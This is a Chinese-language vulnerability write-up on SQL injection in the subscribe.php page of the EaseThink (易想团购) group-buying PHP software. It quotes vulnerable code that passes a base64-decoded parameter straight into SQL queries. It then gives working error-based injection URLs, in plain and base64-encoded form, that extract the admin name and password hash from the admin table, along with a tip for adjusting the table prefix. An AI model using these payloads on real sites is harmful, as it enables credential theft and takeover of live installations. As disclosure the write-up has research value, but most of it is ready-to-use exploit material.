易想团购subscribe.php这个页面存在问题
其中除了$_REQUEST['act']=='mail'选项未添加页面发送信息外,其余选项都拼接了用户发送信息。
属于post表单信息。
elseif($_REQUEST['act']=='unsubscribe')
{
$email_code = trim($_REQUEST['code']); //只去掉了两端预定义字符
$email = base64_decode($email_code); //简单的base64_decode编码 之后就带入了语句
if($GLOBALS['db']->getOne("select count(*) from ".DB_PREFIX."mail_list where mail_address='".$email."'")==0)
{
showErr($GLOBALS['lang']['MAIL_NOT_EXIST'],0,APP_ROOT);
}
else
{
send_unsubscribe_mail($email);
showSuccess($GLOBALS['lang']['MAIL_UNSUBSCRIBE_VERIFY'],0,APP_ROOT);
}
}
elseif($_REQUEST['act']=='dounsubscribe')
{
$email_code = trim($_REQUEST['code']); //和以上一样的错误
$email_code = base64_decode($email_code);
$arr = explode("|",$email_code);
$GLOBALS['db']->query("delete from ".DB_PREFIX."mail_list where code = '".$arr[0]."' and mail_address = '".$arr[1]."'");
$rs = $GLOBALS['db']->affected_rows();
if($rs)
{
showSuccess($GLOBALS['lang']['MAIL_UNSUBSCRIBE_SUCCESS'],0,APP_ROOT);
}
else
{
showErr($GLOBALS['lang']['MAIL_UNSUBSCRIBE_FAILED'],0,APP_ROOT);
}
}
可以看到用户输入很简单的带入了sql语句中,不过最终结果并未直接显示在页面上。还是靠页面返回信息来判断语句执行是否成功
exp构造:
https://ha.cker.in/subscribe.php?act=unsubscribe&code=secer') and (updatexml(1,concat(0x3a,(select concat(adm_name,0x3a,adm_password) from easethink_admin limit 1)),1))#
红色的参数code注入部分base64后:
https://ha.cker.in/subscribe.php?act=unsubscribe&code=c2VjZXInKSBhbmQgKHVwZGF0ZXhtbCgxLGNvbmNhdCgweDNhLChzZWxlY3QgY29uY2F0KGFkbV9uYW1lLDB4M2EsYWRtX3Bhc3N3b3JkKSBmcm9tIGVhc2V0aGlua19hZG1pbiBsaW1pdCAxKSksMSkpIw==
如果不是默认表前缀会报错,修改表前缀后base64编码了再提交。
修改表前缀
https://ha.cker.in/subscribe.php?act=unsubscribe&code=secer' and (updatexml(1,concat(0x3a,(select concat(adm_name,0x3a,adm_password) from esjj_admin limit 1)),1))#
重新提交